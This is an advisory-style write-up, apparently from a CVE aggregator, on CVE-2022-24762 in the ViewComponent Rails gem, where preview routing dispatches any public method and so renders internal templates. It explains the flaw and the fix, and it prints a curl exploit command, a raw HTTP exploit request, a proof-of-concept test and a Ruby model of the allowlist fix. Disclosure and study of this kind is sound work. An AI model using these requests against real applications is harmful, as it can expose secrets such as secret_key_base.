ViewComponent, Insecure Method Dispatch leads to Arbitrary Template Rendering, CVE-2022-24762 (High)


The vulnerability exists in the preview routing mechanism of the ViewComponent Ruby gem (used with Rails). The preview route extracts an example name from the URL path via `File.basename(params[:path])` and calls `public_send(example)` on the preview instance. No validation ensures that the invoked method is an explicitly defined preview example (e.g., `default`, `with_variant`). As a result, any inherited public method of `ViewComponent::Preview` becomes reachable. The most dangerous of these is `render_with_template`, which accepts `template:` and `locals:` parameters from the request. These parameters are passed directly to Rails' `render template:` call without sanitization. An attacker can therefore request a route like `/rails/view_components/my_component/render_with_template?template=internal/secret&locals[<key>]=y` (the locals key is a placeholder; the original value was lost in extraction). The system resolves `my_component` to a valid preview class, then calls `render_with_template` with user-supplied arguments. The preview view (`preview.html.erb`) renders the specified template using `<%= render template: @render_args[:template], locals: @render_args[:locals] || {} %>`. This grants the attacker the ability to render any internal Rails template that is not normally routable, including those containing secrets, configuration data, or administrative partials. The attack bypasses the preview's list of allowed example methods because `render_args` does not check that list before dispatching. The vulnerability is classified as High when preview routes are externally reachable (common in development or misconfigured staging). The fix restricts `render_args` to dispatching only methods present in `examples`, rejecting calls like `render_with_template` unless they are explicitly defined as a preview example.

dailycve form:

Platform: ViewComponent Rails
Version: <2.49.0
Vulnerability: Unvalidated public_send call
Severity: High
Date: 2022-03-28
Prediction: March 29 2022

What Undercode Say:

```bash
# Check installed view_component version
bundle show view_component || gem list view_component

# Simulate exploit with curl (targeting a Rails app with previews enabled);
# the locals key is a placeholder, the original value was lost in extraction
curl -v 'http://localhost:3000/rails/view_components/my_component/render_with_template?template=internal/secret&locals[<key>]=injected'

# Standalone PoC test (Ruby) - from the advisory
cat > test_poc.rb << 'EOF'
require "test_helper"

class SecurityPreviewTemplatePocTest < ActionDispatch::IntegrationTest
  def test_preview_route_renders_internal_template
    get "/rails/view_components/my_component/render_with_template",
        params: { template: "internal/secret", locals: { poc: "x" } }
    assert_response :success
  end
end
EOF

# Run the PoC test
bundle exec ruby -Itest test_poc.rb
```

Exploit:

GET /rails/view_components/any_preview/render_with_template?template=internal%2Fsecret&locals[malicious]=controlled HTTP/1.1
Host: vulnerable-app.com

The request invokes `render_with_template` on the preview instance, passing `template: "internal/secret"` and `locals: { malicious: "controlled" }`. The preview view then renders the non-routable `internal/secret` template with attacker-controlled locals, potentially exposing `Rails.application.secret_key_base` or other sensitive data.

Protection from this CVE

  • Upgrade to `view_component` version 2.49.0 or later.
  • If upgrade is not possible, manually patch `lib/view_component/preview.rb` by adding a method allowlist: `raise AbstractController::ActionNotFound unless examples.include?(example.to_s)` inside render_args.
  • Disable preview routes in production by setting `config.view_component.show_previews = false` (defaults to `false` in production for Rails >= 6.0).
  • Restrict network access to `/rails/view_components/` endpoints (e.g., via firewall or basic authentication).
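As an added illustration (not the gem's code; the class and method names are assumptions), this stand-alone Ruby model shows the dispatch described above and the allowlist fix from the protection list: the unchecked `public_send` reaches the inherited `render_with_template`, while the allowlisted version dispatches only names in `examples`.

```ruby
# Stand-in for the error the page's patch raises (AbstractController::ActionNotFound).
class ActionNotFound < StandardError; end

# Minimal stand-in for ViewComponent::Preview: an inherited public helper plus
# the list of examples that a concrete preview class explicitly defines.
class PreviewBase
  # Inherited public method: reachable through public_send unless dispatch is allowlisted.
  def render_with_template(template: nil, locals: {})
    { template: template, locals: locals }
  end

  # Mirrors the page's extraction: the last path segment names the example.
  def self.example_from_path(path)
    File.basename(path)
  end

  # Only methods defined on the concrete preview class count as examples.
  def self.examples
    public_instance_methods(false).map(&:to_s).sort
  end

  # Vulnerable dispatch: whatever public method the path names gets called.
  def self.render_args_vulnerable(example, params = {})
    new.public_send(example, **params)
  end

  # Hardened dispatch: reject anything outside the explicit example list
  # before touching the request parameters.
  def self.render_args_fixed(example, params = {})
    raise ActionNotFound, "#{example} is not a preview example" unless examples.include?(example.to_s)

    new.public_send(example, **params)
  end

  # True when the hardened dispatcher refuses the example name.
  def self.rejected?(example, params = {})
    render_args_fixed(example, params)
    false
  rescue ActionNotFound
    true
  end
end

# Hypothetical preview class with a single defined example.
class MyComponentPreview < PreviewBase
  def default
    { template: "my_component_preview/default", locals: {} }
  end
end
```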

Impact

Exposure of arbitrary internal Rails templates, leading to leakage of application secrets (e.g., secret_key_base), configuration data, debug information, admin‑only partials, session details, and request parameters. In worst‑case scenarios, combined with template rendering quirks, this could enable limited information disclosure or further attack chaining.

Sources:

Reported By: github.com